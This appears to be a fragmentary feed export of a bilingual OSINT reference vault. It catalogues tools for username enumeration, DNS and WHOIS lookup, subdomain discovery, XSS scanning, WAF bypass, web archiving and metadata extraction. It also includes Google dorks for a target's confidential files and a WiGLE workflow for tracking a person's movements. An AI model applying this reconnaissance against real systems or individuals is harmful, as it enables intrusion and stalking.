Antisocial - Find forgotten accounts across 30+ platforms using three-tier verification: official APIs first, then browser automation, then HTTP content analysis. Reduces false positives to around 5%. Deep search mode adds 500+ platforms via the WhatsMyName database.
Blackbird - Search a username across over 600+ websites.
CheckUser - search username across social networks
Cupidcr4wl - Username and phone number search tool that crawls adult content platforms to see if a targeted account or person is present.
Digital Footprint Check - Check for registered username on 100s of sites for free.
IDCrawl - Search for a username in popular social networks.
Maigret - Collect a dossier on a person by username.
Name Chk - Check over 30 domains and more than 90 social media account platforms.
Name Checkr - checks a domain and username across many platforms.
Name Checkup - is a search tool that allows you to check the avilability of a givrn username from all over the social media. Inaddition it also sllows you to check the avilability of a given domain name.
NameKetchup - checks domain name and username in popular social media sites and platforms.
NexFil - checks username from almost all social network sites.
Seekr A multi-purpose all in one toolkit for gathering and managing OSINT-Data with a neat web-interface. Can be used for note taking and username checking.
Sherlock - Search for a username in multiple platforms/websites.
SherlockEye - Search for publicly available information connected to a username, uncovering associated profiles and activities across the web.
Trace - Real-time OSINT platform to search usernames, emails, phone numbers, and full names across 600+ platforms with breach detection and AI risk scoring.
Snoop - Search for a nickname on the web (OSINT world)
Social Analyzer - API, CLI, and Web App for analyzing and finding a person's profile in 1000 social media \ websites
user-scanner — Check a username's presence across dev/social/gaming/creator site
User Search - Find someone by username, email, phone number or picture across Social Networks, Dating Sites, Forums, Crypto Forums, Chat Sites and Blogs, 3000+ sites Supported!
User Searcher - User-Searcher is a powerful and free tool to help you search username in 2000+ websites.
WhatsMyName - check for usernames across many different platforms.
Fuente complementaria del master osint-references-master. Beyond Maigret and Sherlock:Speed comparison:# Benchmark (10 usernames) sherlock: ~45 seconds maigret: ~90 seconds (more precise) blackbird: ~60 seconds (with report) Importado desde Inbox/NICKNAMES.md durante consolidacion bulk. Herramientas para buscar la presencia de un username o nickname en multiples plataformas y redes sociales simultaneamente. Permiten verificar si un alias esta registrado en cientos de sitios.Enumeracion de usernames / Busqueda de perfiles / Identidad digital. Rastrear la presencia de un alias en multiples plataformas Identificar todas las cuentas asociadas a un nickname Verificar la coherencia de identidades digitales
Parte del flujo de investigacion de people-investigations Sherlock (CLI) y Maigret son alternativas mas potentes para linea de comandos Estas herramientas web son utiles para busquedas rapidas
Ver people-investigations para herramientas de busqueda por nombre real
tema-socmint-completo ]]>projects/socmint/username-enumeration.htmlProjects/socmint/username-enumeration.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Setup of homemade ADS-B receiver:# Configure PiAware on Raspberry Pi sudo apt-get install piaware sudo piaware-config <options> sudo systemctl restart piaware
tema-techint-domain-network ]]>projects/techint/transport-osint.htmlProjects/techint/transport-osint.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. OSINT use case:1. Search unique SSID in WiGLE 2. Find approximate router location 3. Correlate with other geolocation data 4. Identify movements/locations of target
tema-techint-domain-network ]]>projects/techint/wifi-wardriving.htmlProjects/techint/wifi-wardriving.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Basic Photon script:python photon.py -u https://target.com \ --export=json \ --dns \ --keys \ --threads 10
tema-techint-domain-network ]]>projects/techint/web-scraping.htmlProjects/techint/web-scraping.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Complete suite:Metadata workflow:# 1. Extract metadata exiftool -a -u -g1 document.pdf > metadata.txt # 2. Search sensitive info grep -i "author\|creator\|email\|gps" metadata.txt # 3. Clean before publishing mat2 --inplace clean_document.pdf Importado desde Inbox/Hashes.md durante consolidacion bulk. Plataformas clave para busqueda de hashes de malware, analisis de muestras y consulta de indicadores de compromiso. Incluye ratings de utilidad basados en experiencia practica.Analisis de malware / Busqueda de hashes / Threat Intelligence. Verificar si un hash corresponde a malware conocido Analizar muestras sospechosas en sandbox (Triage, Hybrid Analysis) Buscar IOCs relacionados con una campana (OTX, ThreatFox) Obtener muestras de malware para analisis (VX-Underground, MalwareBazaar) VirusTotal, Triage, OTX y BlueLiv son las plataformas mas utiles (rating 3/3) VX-Underground es el mayor archivo publico de muestras de malware Abuse.ch (ThreatFox + MalwareBazaar) son complementarias entre si
Ver web-history-capture para analisis de URLs maliciosas
Ver threat-intelligence-feeds para listas de bloqueo Importado desde Inbox/METADATOS.md durante consolidacion bulk. Herramientas de analisis forense de imagenes y extraccion de metadatos EXIF. Permiten detectar manipulaciones en fotografias, extraer coordenadas GPS, datos de camara y otros metadatos embebidos.Analisis forense / Metadatos EXIF / Verificacion de imagenes. Verificar autenticidad de fotografias mediante analisis ELA Extraer coordenadas GPS de imagenes para geolocalizacion Identificar el dispositivo y software usado para crear una imagen Detectar manipulaciones o ediciones en fotografias FotoForensics es la herramienta mas completa para analisis forense Los datos EXIF pueden revelar ubicacion, hora y dispositivo del fotografo
Ver image-search para herramientas de busqueda inversa de imagenes Muchas redes sociales eliminan datos EXIF al subir imagenes
tema-techint-domain-network ]]>projects/techint/metadata-extraction.htmlProjects/techint/metadata-extraction.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Advanced tools:Speed comparison:# Scan 65k ports on 1 IP nmap: ~5 minutes rustscan: ~10 seconds → then nmap masscan: ~5 seconds (less detail)
tema-techint-domain-network ]]>projects/techint/network-scanning.htmlProjects/techint/network-scanning.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Atom
Brave - is an open-source web browser that allows you to completely block ads and website trackers.
Bromite - Bromite is a Chromium fork with ad blocking and enhanced privacy; take back your browser. Works only on Android.
CentBrowser
Chrome
Comodo Dragon
Coowon
Gnu Icecat -
Edge
Firefox
LibreWolf - Privacy-focused Firefox fork with enhanced security defaults.
Maxthon
Mullvad Browser - Privacy-focused browser developed in collaboration with Tor Project.
Opera
Safari
Sleipnir
Slimjet
SRWare Iron
Tor Browser - Tor is a free software that prevents people from learning your location or browsing habits by letting you communicate anonymously on the Internet.
Torch
UCBrowser
Vivaldi - Powerful, Private and Personal Web Browser.
Waterfox - Fast and Private Web Browser. Get privacy out of the box with Waterfox.
Yandex Browser Importado desde Inbox/EXTENSIONES NAVEGADOR CHROME.md durante consolidacion bulk. Catalogo de extensiones de Google Chrome utiles para investigaciones OSINT. Incluye herramientas de captura de pantalla, extraccion de datos de redes sociales, busqueda inversa de imagenes, notas y gestion de sesiones.Herramientas de navegador / Extensiones Chrome / Productividad OSINT. Capturar evidencia web con FireShot o Nimbus Extraer datos tabulares de paginas con Data Scraper Busqueda inversa rapida de imagenes con RevEye Gestionar multiples sesiones de investigacion con Session Buddy Acceder a versiones cacheadas de paginas eliminadas Session Buddy es esencial para gestionar multiples investigaciones simultaneas RevEye busca en Google, Bing, Yandex y TinEye simultaneamente Ver PRODUCTIVIDAD para mas herramientas de apoyo
Ver android-osint-mobile para herramientas de investigacion movil
tema-techint-domain-network ]]>projects/techint/browsers-osint.htmlProjects/techint/browsers-osint.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Amass - The amass tool searches Internet data sources, performs brute force subdomain enumeration, searches web archives, and uses machine learning to generate additional subdomain name guesses. DNS name resolution is performed across many public servers so the authoritative server will see the traffic coming from different locations. Written in Go.
Columbus Project - Columbus Project is an advanced subdomain discovery service with fast, powerful and easy to use API.
Merklemap - Discover and enumerate all subdomains associated with a website, including those not publicly advertised. Works by ingesting certificate transparency logs. Importado desde Inbox/Informacion DNS.md durante consolidacion bulk. Herramientas para investigacion de registros DNS, geolocalizacion de IPs y resolucion inversa. Permiten mapear infraestructura de red y descubrir relaciones entre dominios e IPs.Infraestructura DNS / Resolucion inversa / Geolocalizacion IP. Descubrir todos los dominios alojados en una IP (Reverse IP) Geolocalizar infraestructura de threat actors Obtener registros DNS completos de un dominio objetivo
Parte del flujo de investigacion de domain-ip-research y domain-ip-research Domain Dossier de CentralOps es la herramienta mas completa (combina DNS + WHOIS + traceroute) Reverse IP Lookup es esencial para descubrir hosting compartido
Ver domain-ip-research para herramientas de consulta WHOIS especificas
Ver web-history-capture para herramientas adicionales de investigacion de sitios web
tema-techint-domain-network ]]>projects/techint/dns-tools.htmlProjects/techint/dns-tools.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
aa419 Fake Sites Database - The site lists fraudulent websites, such as fake banks and online scams, identified by the Artists Against 419 community.
Accuranker
ahrefs - A tool for backlink research, organic traffic research, keyword research, content marketing & more.
Azure Tenant Resolution by PingCastle - Search for Azure Tenant using its domain name or its ID
Bgpview.io - The website bgpview.io allows you to look up detailed information about ASNs, IPs, and BGP routes on the internet.
Bing Webmaster Tools
Browserling - Browserling is an online sandbox that lets users safely test potentially malicious links across browsers and operating systems in real time.
BuiltWith - is a website that will help you find out all the technologies used to build a particular websites.
Central Ops
Crypto Scam & Crypto Phishing URL Threat Intel Feed - A fresh feed of crypto phishing and crypto scam websites. Automatically updated daily.
Dedicated or Not
DNS History
DNSDumpster - is a website that will help you discover hosts related to a specific domain.
DNSStuff
DNSViz
Domain Crawler
Domain Dossier
DomainRecon - Retrieve DNS records, subdomains, SSL certificates and WHOIS / RDAP data for a given website.
Domain Tools - Whois lookup and domain/ip historical data.
Easy whois
Exonera Tor - A database of IP addresses that have been part of the Tor network. It answers the question whether there was a Tor relay running on a given IP address on a given date.
Focsec - Threat Intelligence API that detects if a IP address is associated with a VPN, Proxy, TOR or Bots.
Follow.net
Fullhunt - FullHunt is an OSINT tool focused on identifying and protecting internet-exposed assets.
GraphyStories
Hudson Rock - is a free cybercrime intelligence toolkit to check exposure in Infostealer malware infection.
Hybrid Analysis - Online service for detailed and free analysis of suspicious files and URLs.
HypeStat
Icann Lookup - The site allows you to look up domain registration information (WHOIS) on the internet
Infosniper
isMalicious - Threat intelligence platform aggregating malicious IP and domain data from multiple security feeds with real-time reputation scoring and threat categorization.
IntoDNS.ai - AI-powered DNS and email security scanner with SPF, DKIM, DMARC, DNSSEC checks and fix suggestions.
IP 2 Geolocation
IP 2 Location
IP Geolocation API DB-IP - Pprovides IP geolocation and intelligence.
IP Checking
IP Location - is used for mapping of an IP address or MAC address to the real-world geographic location of an Internet-connected computing or a mobile device.
IP Location.io - IPLocation.io allows you to check the location of an IP for free
IPFingerprints - is used to find the approximate geographic location of an IP address along with some other useful information including ISP, TimeZone, Area Code, State.
IPVoid - IP address toolset.
ISP.Tools - Is a free platform offering network diagnostic tools (ping, traceroute, MTR, DNS, WHOIS, HTTP, etc.) tailored for ISPs and infrastructure professionals.
Kloth
Majestic - Find out who links to your website.
Mark Monitor WHOIS - Displays domain registration information.
MaxMind
MetaDefender - Threat analysis service for URLs, files, certificates, domains, and suspicious hashes.
Netcraft Site Report - is an online database that will provide you a report with detail information about a particular website and the history associated with it.
OpenLinkProfiler
PageGlimpse
Pentest-Tools.com - uses advanced search operators (Google Dorks) to find juicy information about target websites.
PhishStats
Pulsedive
Qualys SSL Check - SSL Test configuration compliance.
Quantcast
Quick Sprout
RedirectDetective
Remote DNS Lookup
Robtex - is an IP address and domain name based researching websites that offers multiple services such as Reverse DNS Lookup, Whois, and AS Macros.
SameID
SecurityTrails - API to search current and historical DNS records, current and historical WHOIS, technologies used by sites and whois search for phone, email, address, IPs etc.
SubDomainRadar.io - Fast subdomain finder with multiple search modes and the most extensive data sources, offering real-time notifications.
SEMrush
SEO Chat Tools
SEOTools for Excel
Similar Web - Compare any website traffic statistics & analytics.
SmallSEOTools
Squatm3gator - Enumerate available domains generated modifying the original domain name through different cybersquatting techniques
StatsCrop
TinyScan - Another powerful URL scan tool that provides comprehensive information about any given URL. Get insights into IP address, location, screenshots, technology stack, performance metrics, and more.
TracerouteVisualizer - An online tool that displays your mtr / traceroute / flyingroutes output on a map for visual analysis.
urlDNA - Unleash website insights! urldna.io analyzes url, monitors brands and track phishing sites.
URLhaus - URLhaus shares malicious URLs to combat malware and botnet threats
urlQuery
urlscan - is a free service to scan and analyse websites.
URLVoid - Analyzes a website through multiple blacklist engines and online reputation tools to facilitate the detection of fraudulent and malicious websites.
Validin - Website and API to search current and historical DNS records for free
Verisign
ViewDNS.info
Virus Total - Analyse suspicious domains, IPs URLs and files to detect malware and other breaches
w3snoop - is a website that gives you a free and comprehensive report about a specific website.
Web-Check - All-in-one tool for viewing website and server meta data.
WebMeUp - is the Web's freshest and fastest growing backlink index, and the primary source of backlink data for SEO PowerSuite.
Webscore - Enter a website URL to check its legitimacy.
Webscout - A Swiss Army knife for scaled intelligence and metadata on IP addresses and domains.
Website Informer
WebsiteTechMiner.py - automates gathering website profiling data into a CSV from the "BuiltWith" or "Wappalyzer" API for tech stack information, technographic data, website reports, website tech lookups, website architecture lookups, etc.
WhatIsMyIPAddress
Who.is - Domain whois information.
Whois Arin Online - is a web service for Whois data contained within ARIN's registration database
WhoIsHostingThis
WhoisMind
Whoisology
WhoIsRequest
WiGLE - Wi-fi "wardriving" database. Contains a global map containing crowdsourced information on the location, name, and other properties of wi-fi networks. Software available to download to contribute data to the public infoset.
You Get Signal
Fuente complementaria del master osint-references-master. site:*.target.com filetype:pdf site:*.target.com intitle:"dashboard" site:*.target.com intext:"confidential" Importado desde Inbox/Direccion de IP.md durante consolidacion bulk. Indice maestro que organiza todos los recursos disponibles para la investigacion de direcciones IP. Cada seccion enlaza a un catalogo detallado de herramientas especificas.Investigacion de infraestructura / Direcciones IP / Indice maestro. Investigacion completa de una direccion IP sospechosa Atribucion de infraestructura de threat actors Analisis de superficie de ataque de una organizacion Seguir el flujo completo: WHOIS -> DNS -> Rangos IP -> BGP -> Blacklists
Ver domain-ip-research para la investigacion complementaria de dominios
Este indice es parte de la estructura principal de osint-references-master Importado desde Inbox/Dominios.md durante consolidacion bulk. Indice maestro de recursos para la investigacion de dominios. Organiza las herramientas por categoria: amenazas, filtraciones, buscadores, WHOIS y DNS.Investigacion de infraestructura / Dominios / Indice maestro. Investigacion completa de un dominio sospechoso Atribucion de infraestructura de campanas maliciosas Analisis de superficie de ataque Flujo tipico: WHOIS -> DNS -> Buscadores -> Data Leaks
Ver domain-ip-research para la investigacion complementaria de IPs
Ver web-history-capture para herramientas adicionales de investigacion web
Ver domain-ip-research para herramientas de enumeracion Importado desde Inbox/Enumeración o Toma de Control de Subdominios.md durante consolidacion bulk. Catálogo masivo de ~50 herramientas GitHub para pentesting de infraestructura web: enumeración de subdominios (subDomainsBrute, Sublist3r, Aquatone, Amass), fingerprinting web (WhatWeb, FingerPrint), escaneo de vulnerabilidades (XSS con DalFox/PwnXSS/DSXS, WAF bypass con WhatWaf), descubrimiento de directorios (dirsearch, DirBrute, wfuzz), análisis de infraestructura (bannerscan, domain_analyzer, cipherscan) y detección de CDN (whichCDN, xcdn). Cada entrada incluye enlace directo al repositorio y descripción breve.
https://github.com/lijiejie/subDomainsBrute - Herramienta clásica de enumeración de subdominios por lijiejie. 🔍🔒🌐
https://github.com/ring04h/wydomain - Una herramienta de enumeración de subdominios rápida y precisa por ringzero. 🏹🔍🎯
https://github.com/le4f/dnsmaper - Herramienta de enumeración de subdominios con registro de mapas. 🗺️🔍🌐
https://github.com/We5ter/GSDF - Enumeración de subdominios a través de la transparencia de certificados de Google. 🔍🔒🔍
https://github.com/mandatoryprogrammer/cloudflare_enum - Enumeración de subdominios a través de CloudFlare. ☁️🔍🌐
https://github.com/guelfoweb/knock - Escaneo de subdominios con Knock. 👊🔍🌐
https://github.com/exp-db/PythonPool/tree/master/Tools/DomainSeeker - Una herramienta de enumeración de subdominios de Python integrada. 🐍🔍🌐
https://github.com/code-scan/BroDomain - Encuentra subdominios relacionados. 👥🔍🌐
https://github.com/chuhades/dnsbrute - Una herramienta rápida de brute force de dominios. ⏩🔍🌐
https://github.com/yanxiu0614/subdomain3 - Una herramienta simple y rápida para forzar subdominios. 🔍🔍🌐
https://github.com/michenriksen/aquatone - Una poderosa herramienta de subdominios y detección de toma de control de dominios. 🔍🔍🚩
https://github.com/evilsocket/dnssearch - Una herramienta de enumeración de subdominios. 🔍🌐
https://github.com/reconned/domained - Herramientas de enumeración de subdominios para la caza de errores. 🔍🎯🌐
https://github.com/bit4woo/Teemo - Una herramienta de colección de nombres de dominio y direcciones de correo electrónico. 📧🔍🌐
https://github.com/laramies/theHarvester - Herramienta de recolección de correos electrónicos, subdominios y nombres de personas. 📧🔍🌐
https://github.com/nmalcolm/Inventus - Una araña diseñada para encontrar subdominios de un dominio específico rastreándolo. 🕷️🔍🌐
https://github.com/aboul3la/Sublist3r - Herramienta rápida de enumeración de subdominios para probadores de penetración. 🔍🔍🌐
https://github.com/jonluca/Anubis - Herramienta de enumeración y recopilación de información de subdominios. 🔍📈🌐
🔍 https://github.com/urbanadventurer/whatweb - Identificador de huellas digitales de sitios web 🕵️‍♂️
🔍 https://github.com/tanjiti/FingerPrint - Otro identificador de huellas digitales de sitios web 🕵️‍♂️
🔍 https://github.com/nanshihui/Scan-T - Un nuevo rastreador basado en Python con más funciones, incluida la búsqueda de huellas digitales de red 🌐
🔍 https://github.com/OffensivePython/Nscan - Escáner rápido de Internet en toda la red 🌐
🔍 https://github.com/ywolf/F-NAScan - Script para escanear información de activos de red 🕵️‍♂️
🔍 https://github.com/maurosoria/dirsearch - Escáner de rutas web 🛣️
🔍 https://github.com/x0day/bannerscan - Escáner de banners de red con rutas 📟
🔍 https://github.com/RASSec/RASscan - Escáner interno de puertos y servicios de red 🌐
🔍 https://github.com/3xp10it/bypass_waf - Herramienta de omisión automática de WAF 🛡️
🔍 https://github.com/3xp10it/xcdn - Intenta encontrar la dirección IP real detrás de CDN 🌐
🔍 https://github.com/Xyntax/BingC - Consulta C / lado detenido basada en el motor de búsqueda Bing, con soporte para API 🕵️‍♂️
🔍 https://github.com/Xyntax/DirBrute - Herramienta de enumeración de directorios web de múltiples hilos 🌐
🔍 https://github.com/zer0h/httpscan - Detector de servicios HTTP con rastreador de IP/CIDR 🚀
🔍 https://github.com/lietdai/doom - Escáner de vulnerabilidades de puertos IP distribuidos basado en Thorn 🌐
🔍 https://github.com/chichou/grab.js - Herramienta rápida de captura de banners TCP, similar a zgrab pero compatible con muchos más protocolos 📟
🔍 https://github.com/Nitr4x/whichCDN - Detecta si un sitio web dado está protegido por una CDN 🛡️
🔍 https://github.com/secfree/bcrpscan - Escáner de rutas web basado en resultados de rastreo 🌐
🔍 https://github.com/mozilla/ssh_scan - Prototipo de escáner de configuración y políticas SSH 📡
🔍 https://github.com/18F/domain-scan - Escanea dominios para obtener datos sobre su configuración de HTTPS y otras cosas diversas 🌐
🔍 https://github.com/ggusoft/inforfinder - Herramienta para recopilar información de cualquier dominio que apunte a un servidor e identificador de huellas digitales 🕵️‍♂️
🔍 https://github.com/boy-hack/gwhatweb - Identificador de huellas digitales para CMS 🕵️‍♂️
🔍 https://github.com/Mosuan/FileScan - Escáner de archivos sensibles 📁
🔍 https://github.com/Xyntax/FileSensor - Herramienta de detección de archivos dinámicos basada en rastreador 🚀
🔍 https://github.com/deibit/cansina - Herramienta de descubrimiento de contenido web 🌐
🔍 https://github.com/mozilla/cipherscan - Una forma muy simple de averiguar qué suites de cifrado SSL son compatibles con un objetivo 📟
🔍 https://github.com/xmendez/wfuzz - Marco de trabajo de aplicación web y escáner de contenido web 🌐
🔍 https://github.com/s0md3v/Breacher - Un buscador de paneles de administración avanzado y multihilo escrito en Python 🛡️
🔍 https://github.com/ztgrace/changeme - Un escáner de credenciales predeterminadas 🗝️
🔍 https://github.com/medbenali/CyberScan - Una herramienta de pruebas de penetración de código abierto que puede analizar paquetes, decodificar, escanear puertos, hacer ping y geolocalizar una IP 🌐
🔍 https://github.com/m0nad/HellRaiser - Escanea HellRaiser con nmap y correlaciona los cpe encontrados con cve-search para enumerar vulnerabilidades 🕵️‍♂️
🔍 https://github.com/scipag/vulscan - Escaneo avanzado de vulnerabilidades con Nmap NSE 🚀
🔍 https://github.com/jekyc/wig - Herramienta de recopilación de información de aplicaciones web 🌐
🔍 https://github.com/eldraco/domain_analyzer - Analiza la seguridad de cualquier dominio encontrando toda la información posible 🕵️‍♂️
🔍 https://github.com/cloudtracer/paskto - Escáner de directorios pasivo y rastreador web basado en la base de datos de Nikto 🌐
🔍 https://github.com/zerokeeper/WebEye - Un identificador de servicios web y WAF 🕵️‍♂️
🔍 https://github.com/m3liot/shcheck - Verifica solo las cabeceras de seguridad en un sitio web objetivo 🛡️
🔍 https://github.com/aipengjie/sensitivefilescan - Un escáner de archivos sensibles rápido e impresionante 📁
🔍 https://github.com/fnk0c/cangibrina - Un buscador de paneles (admin) rápido y poderoso 🚀
🔍 https://github.com/n4xh4ck5/CMSsc4n - Herramienta para identificar si un dominio es un CMS como WordPress, Moodle, Joomla 📦
🔍 https://github.com/Ekultek/WhatWaf - Detecta y omite firewalls de aplicaciones web y sistemas de protección 🛡️
🔍 https://github.com/dzonerzy/goWAPT - Herramienta de prueba de penetración de aplicaciones web Go y herramienta de prueba de aplicaciones web 🌐
🔍 https://github.com/blackye/webdirdig - Escáner de archivos sensibles 📁
🔍 https://github.com/boy-hack/w8fuckcdn - Obtén la dirección IP real del sitio web escaneando toda la red 🌐
https://github.com/stamparm/DSXS - Un escáner completamente funcional de vulnerabilidad de cross-site scripting, compatible con parámetros GET y POST, y escrito en menos de 100 líneas de código 🏴‍☠️
🔍 https://github.com/fcavallarin/domdig - Escáner de DOM XSS para aplicaciones de página única 🕷️
🔍 https://github.com/lwzSoviet/NoXss - Escáner de XSS reflejado y DOM-XSS más rápido basado en Phantomjs 🎭
🔍 https://github.com/pwn0sec/PwnXSS - Un potente escáner de XSS hecho en Python 3.7 🚀
🔍 https://github.com/hahwul/dalfox - Herramienta de análisis de parámetros y escaneo de XSS basada en golang 🎯 Importado desde Inbox/Rangos IP.md durante consolidacion bulk. Herramientas para consultar rangos de direcciones IP, asignaciones de bloques CIDR y relaciones entre IPs y dominios. Esenciales para mapear la infraestructura de un objetivo.Rangos IP / Registro de IPs / Inteligencia de infraestructura. Consultar a que organizacion pertenece un rango de IPs Identificar todos los dominios alojados en un rango IP Mapear la infraestructura de red de un objetivo Correlacionar IPs con dominios maliciosos RIPE cubre Europa, Oriente Medio y Asia Central; para otras regiones usar ARIN, APNIC, LACNIC o AFRINIC
Ver domain-ip-research para consultas WHOIS de dominios
Ver domain-ip-research para herramientas de geolocalizacion de IPs
Ver bgp-seekers para consultas de enrutamiento BGP Importado desde Inbox/WHOIS.md durante consolidacion bulk. Herramientas para consultar registros WHOIS de dominios: informacion de registrante, fechas de registro, servidores DNS y datos de contacto. Fundamentales en cualquier investigacion de infraestructura.Consulta WHOIS / Registro de dominios / Inteligencia de infraestructura. Obtener datos de registro de un dominio sospechoso Identificar al registrante de un dominio (cuando no hay privacy) Verificar fechas de creacion y expiracion de dominios Correlacionar dominios por datos compartidos de registrante DomainTools ofrece el mejor historico de WHOIS (WHOIS history) Muchos dominios usan servicios de privacidad que ocultan datos del registrante Domain Dossier de CentralOps ofrece el informe mas completo en una sola consulta
Ver web-history-capture para herramientas de investigacion de sitios web
Ver domain-ip-research para consulta de bloques IP asociados
tema-techint-domain-network ]]>projects/techint/domain-ip-research.htmlProjects/techint/domain-ip-research.mdTue, 28 Apr 2026 14:29:14 GMTWHOIS History Tool] IP Address: [IP Address] Server Location: [Geographical Location] Hosting Provider: [Provider's Name] DNS Configuration: [Details of DNS Settings] Main Themes: [Core Topics and Messages] Content Management System: [CMS Used, e.g., WordPress, Joomla] Key Pages and Sections: [Overview of Main Site Areas] Multimedia Elements: [Use of Images, Videos, Interactive Content] SSL Certificate: [Validity and Provider]
Malware Scan: [Results of Recent Scans, e.g., Sucuri SiteCheck]
Vulnerabilities: [Known Issues from Sources like CVE] Data Privacy: [Compliance with Regulations like GDPR or CCPA]
Traffic Estimates: [Visitor Numbers, Sources, e.g., SimilarWeb]
Search Engine Ranking: [Keywords and Positions, e.g., SEMrush]
Backlink Profile: [Overview of Incoming Links, e.g., Ahrefs] Social Media Engagement: [Analysis of Social Media Influence and Links] Copyright Notices: [Existence and Validity] Terms of Service & Privacy Policy: [Compliance and Coverage] Domain Disputes: [History of UDRP cases or other legal issues] Content Strategy: [Suggestions for Content Enhancement] Security Measures: [Recommendations for Addressing Vulnerabilities] SEO Strategies: [Advice for Improving Search Visibility and User Engagement] Appendix A: Detailed WHOIS Record Appendix B: Full DNS Record Analysis Appendix C: Website Content Inventory [List of Tools and Databases Used for Analysis] {{date}}: Initial creation and data gathering. {{date}}: Updated with comprehensive security review. {{date}}: Final adjustments post peer review.
tema-report-writing-cti
tema-techint-domain-network ]]>projects/techint/reporte-ejemplo-domain-website.htmlProjects/techint/reporte-ejemplo-domain-website.mdTue, 28 Apr 2026 14:29:14 GMTDraw.io. IP Range: Listing of IP addresses associated with the target network. Domain Names: Associated domain names and any relevant DNS information.
Scanning Tools Used: List of network scanning tools and software used, e.g., Nmap, Nessus. Identified Vulnerabilities: Details of vulnerabilities found, including CVSS scores and potential impact. Misconfigurations: Overview of network misconfigurations and security weaknesses identified. Exposed Services: List and analysis of services exposed to the internet or internal network. Service Configurations: Examination of service settings for security implications. Authentication Mechanisms: Review of authentication methods and password policies. Firewall and IDS Configurations: Assessment of firewall rules and intrusion detection settings. Log Analysis: Summary of findings from system and security log reviews. Incident Response Capability: Evaluation of the network's ability to detect and respond to security incidents. Encryption Standards: Analysis of encryption protocols used for data transmission and storage. Data Access Controls: Review of data access levels and permissions. Data Backup and Recovery: Assessment of backup solutions and disaster recovery plans. Bandwidth Usage: Overview of network traffic and bandwidth utilization. Latency and Packet Loss: Measurements of network performance metrics. Network Health Monitoring: Tools and practices used for ongoing network health assessment. Compliance Standards: Review against applicable compliance standards such as GDPR, HIPAA, PCI-DSS. Regulatory Findings: Any compliance gaps or regulatory issues identified. Risk Scoring: Evaluation of identified risks based on severity and likelihood. Threat Landscape: Analysis of potential external and internal threats to the network. Remediation Steps: Prioritized list of actions to address identified vulnerabilities and misconfigurations. Security Best Practices: Recommendations for improving network security posture and compliance. Future Monitoring Strategies: Suggestions for continuous monitoring and incident detection. Appendix A: Full Network Scan Reports Appendix B: Detailed Vulnerability Assessment Results Appendix C: Compliance Checklist and Findings [Network Security Tools, Compliance Guidelines, Industry Best Practices] {{date}}: Initial reconnaissance and network mapping. {{date}}: Updated with vulnerability assessment results. {{date}}: Final review, risk assessment, and recommendations.
tema-report-writing-cti
tema-techint-domain-network ]]>projects/techint/reporte-ejemplo-network-recon.htmlProjects/techint/reporte-ejemplo-network-recon.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
A1 Website Download - Download entire websites to disk.
Cyotek WebCopy - is a free tool for automatically downloading the content of a website onto your local device.
gmapcatcher
Hooey webprint
HTTrack - Allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer.
Offliberty - is a website that lets you access any online content without a permanent Internet connection.
Resolver
SiteSucker
WebAssistant
Website Ripper Copier
tema-techint-domain-network ]]>projects/techint/offline-browsing.htmlProjects/techint/offline-browsing.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Archive.is - is a website that allows you to archive a snapshot of you websites that will always remains online evenif the original page disappears.
BlackWidow
CashedPages
CachedView
stored.website
Wayback Machine - Explore the history of a website.
Wayback Machine Archiver
Wayback-Archive - Download complete websites from the Wayback Machine with full asset preservation for offline viewing.
waybackpy - Python package & CLI tool that interfaces the Wayback Machine APIs. Importado desde Inbox/MAQUINA DEL TIEMPO.md durante consolidacion bulk. Herramientas fundamentales para acceder a versiones historicas de sitios web y contenido eliminado de internet. Esenciales para preservar evidencia y recuperar informacion borrada.Archivos web / Wayback Machine / Preservacion de evidencia. Recuperar contenido eliminado de sitios web Preservar evidencia antes de que sea borrada Comparar versiones historicas de un sitio web Acceder a paginas web caidas o censuradas Wayback Machine es la herramienta mas completa con archivos desde 1996 Archive.fo (tambien archive.is/archive.today) permite crear archivos bajo demanda
Ver web-history-capture para herramientas de investigacion de sitios web activos
Ver web-history-capture para herramientas de analisis de URLs Importado desde Inbox/URL's.md durante consolidacion bulk.
Catalogo completo de herramientas para analizar, verificar y buscar URLs maliciosas. Combina plataformas de threat intelligence, escaneadores de URLs, bases de datos de phishing y servicios de verificacion. Incluye solapamiento intencional con data-breach-search-engines para cobertura completa.Analisis de URLs / Verificacion de phishing / Threat Intelligence. Analizar una URL sospechosa antes de acceder Verificar si una URL esta en bases de datos de phishing Correlacionar URLs maliciosas con campanas de amenazas Generar listas de bloqueo para proxies y firewalls
Este catalogo tiene solapamiento con data-breach-search-engines intencionalmente VirusTotal, OTX y ThreatFox son las plataformas mas completas urlscan.io proporciona el mejor sandbox para analisis de URLs
Ver web-history-capture para herramientas de investigacion de sitios web
Ver web-history-capture para recuperar contenido eliminado Importado desde Inbox/WEBS.md durante consolidacion bulk. Catalogo de herramientas para investigacion de dominios y sitios web activos. Cubren monitorizacion de cambios, informacion de dominio, registros DNS, reputacion de sitios y conversion host/IP.Investigacion de webs / Analisis de dominios / Monitorizacion de sitios. Monitorizar cambios en un sitio web objetivo (Distill.io) Investigar tecnologias y hosting de un dominio (Netcraft) Descubrir subdominios y registros DNS (DNSdumpster) Consultar informacion WHOIS de dominios .es (Nic.es) Realizar busqueda inversa de IP a dominios (ViewDNS, DNSlytics) DNSdumpster es excelente para reconocimiento inicial de infraestructura Netcraft proporciona historial de hosting y tecnologias detectadas
Ver domain-ip-research para herramientas especificas de WHOIS
Ver domain-ip-research para consulta de bloques IP
Ver dns-tools para analisis DNS detallado
Ver web-history-capture para versiones historicas de sitios web
